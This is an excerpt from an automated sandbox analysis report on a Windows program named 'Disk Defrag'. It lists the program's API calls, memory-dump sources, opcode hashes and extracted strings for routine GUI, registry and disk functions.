                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8361E6B0505F409FC360DF3A9880B9BFBE4BB48305F90492EE1AE93241DB796548CF5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __aullrem$__aulldiv
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3670715282-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9c34d576a32de794e1e0b0d0fca0d0e7c205ee0b047ab4e09ce85ba4a67a3df8
                                                                                                                                                                                                                                                                                                • Instruction ID: fa94849079e70c1b34915df37323d6afc94868806176a113829b563514bd0fbf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c34d576a32de794e1e0b0d0fca0d0e7c205ee0b047ab4e09ce85ba4a67a3df8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43311775208305AFD200EA65E881D2FB3E9EBC8749F50491EF98497302D738FD498AB6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0041F6D0,?,75A85540,?,?,0041F6D0,00000000,?,00000000,03E80000,?,00000000,?,DiskDefrag,DiskCheckMask,00000000), ref: 004262B5
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,75A85540,00000001,00000000,?,00000000,00000000,?,75A85540,?,?,0041F6D0,00000000,?,00000000), ref: 004262E1
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,75A85540,?,?,0041F6D0,00000000,?,00000000,03E80000,?,00000000,?,DiskDefrag,DiskCheckMask,00000000,?), ref: 004262F2
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,75A85540,00000001,00000000,00000000,00000000,00000000,?,75A85540,?,?,0041F6D0,00000000,?,00000000), ref: 0042630F
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,75A85540,00000001,00000000,00000000,00000000,00000000,?,75A85540,?,?,0041F6D0,00000000,?,00000000), ref: 00426330
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3322701435-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 406f029fa45b1055b96b03b8e5df20f9be275f8369c24922fb13ea929e72a033
                                                                                                                                                                                                                                                                                                • Instruction ID: cb33d9e4ec5480741093735bde79ecc2fcd6722e1911622dc14afd3accb78fd4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 406f029fa45b1055b96b03b8e5df20f9be275f8369c24922fb13ea929e72a033
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E1191713803156BE220AFA4ECC6F27769CD745B04F61083DFB45AA2C1D5A47C448668
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A7E0: RegOpenKeyW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\services\BootDefrag), ref: 0041A7F7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A730: CreateMutexW.KERNEL32(00000000,00000000,{4391F12D-936B-4037-9383-DCB800DF7B65}), ref: 0041A742
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A7B0: CloseHandle.KERNEL32(?,0041A113), ref: 0041A7BB
                                                                                                                                                                                                                                                                                                • EnumWindows.USER32(Function_00019F90,?), ref: 0041A121
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0041A12C
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0041A13F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0041A157
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0041A18A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSendWindow$CloseCreateEnumForegroundHandleMutexOpenWindows
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4196083293-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9e6c0fe9baec171d7626c0c65e47d53d225f7aa6f943c70b518a3cd763a0f699
                                                                                                                                                                                                                                                                                                • Instruction ID: d762d58b284716c123194df2d56f313edae6d07df6750aca61f6228c44254caf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e6c0fe9baec171d7626c0c65e47d53d225f7aa6f943c70b518a3cd763a0f699
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58218E71609341AFC315DF15D885AABBBE8FFC8304F00492EF14983291DB79E885CB56
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$Client$EventMouseTrack
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1879027383-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                                • Instruction ID: 080451bb04fed4ed38a755b401fe0e9ad2b372c89e4fc55ac88ae6bf0dae2c00
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84115EB5104745AFD724CF64C848B9B77E8FB84304F10893EE88A87690E7B9E588CB95
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0046CF84
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0046CFAB
                                                                                                                                                                                                                                                                                                • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0046CFCB
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0046CFDA
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0046CFF1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ObjectSelect$Release
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3581861777-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 09afa59c7c7bf345e2bd9cfd905d74781f37247dddbab7f6bac84dc0e12143ed
                                                                                                                                                                                                                                                                                                • Instruction ID: daceeca4effa55fca9f5214fa6f3dce8251d9e38b51f783a69048b93fac7a53b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09afa59c7c7bf345e2bd9cfd905d74781f37247dddbab7f6bac84dc0e12143ed
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 751115B5200601AFC314DFA9C9C8C27B7EAFF88600700C62DB94987601DB35FC45CB64
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$Parent$InflateInvalidateWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3567486610-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                                • Instruction ID: 59621ce25ffcf61443309c609473fb22192222cc28d28fc8a60ac4e9d60af83f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF044B6100304BFC210EB74DC8AD6B77ACFBC8700F008A1DB58A87191EA74F540CB65
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00497DC0,75FD5780,?,004658D6), ref: 0040122D
                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00497DC0), ref: 00401243
                                                                                                                                                                                                                                                                                                • GdiplusShutdown.GDIPLUS(00000000), ref: 0040124F
                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00497DC0), ref: 00401263
                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00497DC0), ref: 0040126A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$GdiplusShutdown
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3506214061-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b92e5560af5050c5c6993437e068edb64c42205fc1de9f9bdd2150818b8b9fdd
                                                                                                                                                                                                                                                                                                • Instruction ID: 085117cba8507ed758f2e3bd9e34728127d7a1f2de7180c4966a7f221b9c7101
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b92e5560af5050c5c6993437e068edb64c42205fc1de9f9bdd2150818b8b9fdd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16E0863166C2145ACA007BB6BC49B663F64AFC0B1471941BFE008B31E0C57855448FFD
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00428B67
                                                                                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00428C3B
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00428C8D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleMultipleObjectsThreadWait
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 1263187225-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 2d7ebfa6a9a2b4656dd8fa51e96b61bd1dce91ce0a765f2429ab83b963c119d1
                                                                                                                                                                                                                                                                                                • Instruction ID: a913cb5e350b9d2bc9fc20d1f9b00526ce29f1f5c0cea8f0350da80d90f5eb0a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d7ebfa6a9a2b4656dd8fa51e96b61bd1dce91ce0a765f2429ab83b963c119d1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58D17F71706225DFC724EFA4E88462EB7B0BF44300F94896EF85597351DB75E880CBAA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00422F48
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalEnterRedrawSectionWindow
                                                                                                                                                                                                                                                                                                • String ID: DiskChecked$DiskDefrag$`=
                                                                                                                                                                                                                                                                                                • API String ID: 142774367-3347577070
                                                                                                                                                                                                                                                                                                • Opcode ID: aeef45741bab38b063411b41e8f748650579216e3e116eb844468464c405ede7
                                                                                                                                                                                                                                                                                                • Instruction ID: fed9d3ca3bfe53db5501e1f63bebbc1333baccd255b2eb749adb8bf470123f53
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aeef45741bab38b063411b41e8f748650579216e3e116eb844468464c405ede7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E151A43170061AABC31CEF6CD995AA9F3A1BB84300F85862EED158B781D7B4B951DBC4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 004679CE
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004679E4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$DeleteObject
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 4188969710-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 6ae490451279346f20ff5a9bdc53e8c576f5efa59d3a88cf8cb8055c59d1975e
                                                                                                                                                                                                                                                                                                • Instruction ID: 57d6ba00d9628d7bc6127d5ab1f70525051783d1f21ea283ef51d44a992bc025
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ae490451279346f20ff5a9bdc53e8c576f5efa59d3a88cf8cb8055c59d1975e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92612C70A08316DFD714EF64C884A1AB7A5BF84318F1088AEE955A7351E734EC45CFAB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: Back$GUBar::CDrawObjectFactory::CreateRectTextDraw$Text
                                                                                                                                                                                                                                                                                                • API String ID: 0-2901586747
                                                                                                                                                                                                                                                                                                • Opcode ID: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                                • Instruction ID: 94c29d93b79a1152409cb834b352fc504edd985983e521adcc95b20eb26bf893
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6514F75604315EFC710DF25C880A6BB7E8EB88754F104A2EF84997380E779ED458B9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,?,00000000), ref: 004311B1
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004311C3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • ColorIndex, xrefs: 00431185
                                                                                                                                                                                                                                                                                                • DiskDefrag\Setting Option\Gereral\DefragColor, xrefs: 0043118A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: ColorIndex$DiskDefrag\Setting Option\Gereral\DefragColor
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1631410767
                                                                                                                                                                                                                                                                                                • Opcode ID: 502c51c2ec178f428166c2452066da618523e55121de244a43143375eb21c717
                                                                                                                                                                                                                                                                                                • Instruction ID: 3c3eec78f5ba70d7f73749eb8d42c303dcc8a252b1b76d151490117dce650f0e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 502c51c2ec178f428166c2452066da618523e55121de244a43143375eb21c717
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F34119717802055BEB10AF75CD82FBA3284DB59764F000A3EFA06EF2D2DA6CDC48466D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetSystemPowerStatus.KERNEL32 ref: 00423907
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(00000001,00000000), ref: 004239E8
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(1088D068,00000000), ref: 00423A15
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LongNamePath$PowerStatusSystem
                                                                                                                                                                                                                                                                                                • String ID: 3400003
                                                                                                                                                                                                                                                                                                • API String ID: 2229323602-2398869336
                                                                                                                                                                                                                                                                                                • Opcode ID: 1774eee42c2f9bc1d1c4b8b4087ba9fc768ba30c676f6cd1993615a2d7b343a3
                                                                                                                                                                                                                                                                                                • Instruction ID: 559a5a5f11ad9cbb26b2ef481da3000354db79d5173c1cf665cce4c119cf32f6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1774eee42c2f9bc1d1c4b8b4087ba9fc768ba30c676f6cd1993615a2d7b343a3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C51C6712083419FD310EF20DD85BABB7F8AF88715F50092EF199921D1DB78AA49CB5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00422C04
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalEnterRedrawSectionWindow
                                                                                                                                                                                                                                                                                                • String ID: DiskChecked$DiskDefrag$`=
                                                                                                                                                                                                                                                                                                • API String ID: 142774367-3347577070
                                                                                                                                                                                                                                                                                                • Opcode ID: 7b3785d154c84e13650d4089b12ddb33fc3ddbb9f3bc8d58731a5152a72f2c07
                                                                                                                                                                                                                                                                                                • Instruction ID: 0b9e0d0bd62f39a9103a5831cbb30b95e2098115bf74eedd830be0e4041926e5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b3785d154c84e13650d4089b12ddb33fc3ddbb9f3bc8d58731a5152a72f2c07
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 644196313007059FC728EE2DDD85BAAB7E1BF84304F94852EED468F385DAB4B845C654
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,75A7AF60), ref: 0041DB8A
                                                                                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000200), ref: 00402ADD
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00402AF7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA20: SHGetFileInfoW.SHELL32(?,00000000,000002B4,000002B4,00004001), ref: 0041AA4D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001214,00000004,00000000), ref: 00402B9F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileInfoMessageSend$DriveDrivesLogicalType
                                                                                                                                                                                                                                                                                                • String ID: C:\
                                                                                                                                                                                                                                                                                                • API String ID: 2359154852-3404278061
                                                                                                                                                                                                                                                                                                • Opcode ID: 3170ff8149e9c2b6ee3bcf2834819091aa34d1669217c11efa96fe0deec9a490
                                                                                                                                                                                                                                                                                                • Instruction ID: 82d795afe4258906e57f36ef34ec2eb48dfa52df3f098ca2abc9abbdf1da0df4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3170ff8149e9c2b6ee3bcf2834819091aa34d1669217c11efa96fe0deec9a490
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D541D6717443406BE324DF61DC86FAA73A4AB84B04F00492DF249AB2C1DBB4A545CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004619BD
                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,Disk Defrag,00040010), ref: 004619FE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLastMessage
                                                                                                                                                                                                                                                                                                • String ID: %c:\$Disk Defrag
                                                                                                                                                                                                                                                                                                • API String ID: 463093485-3222931339
                                                                                                                                                                                                                                                                                                • Opcode ID: 518deffa12bdbb6d37a9a145068253991ac5e7d9b5727993573dfc0c972e2c19
                                                                                                                                                                                                                                                                                                • Instruction ID: 731faf273718486ffcde032920aca0e1f319cedce5eb76f7311323341e126d0a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 518deffa12bdbb6d37a9a145068253991ac5e7d9b5727993573dfc0c972e2c19
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E64195712087419FC324DF25D845B6BB7E4EF84715F044A2EF599C7290EB74A808CB9B
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,?), ref: 00410C49
                                                                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(%HOMEDRIVE%,?,0000000C), ref: 00410C8F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandInformationStringsVolume
                                                                                                                                                                                                                                                                                                • String ID: %HOMEDRIVE%$NTFS
                                                                                                                                                                                                                                                                                                • API String ID: 1751349637-3402063299
                                                                                                                                                                                                                                                                                                • Opcode ID: 074aaa8893bb910327e97c9f9852001168cb7cda255d028d6430084e15aab4d5
                                                                                                                                                                                                                                                                                                • Instruction ID: 637acb8aad6857eaaece39300668810a01c8d3601b07b0b48692e68ec32a0e85
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 074aaa8893bb910327e97c9f9852001168cb7cda255d028d6430084e15aab4d5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 224160706083019BD714DF75CA86BAB77E4AF88704F40493EB949C7291EBB8D984CB5A
                                                                                                                                                                                                                                                                                                APIs
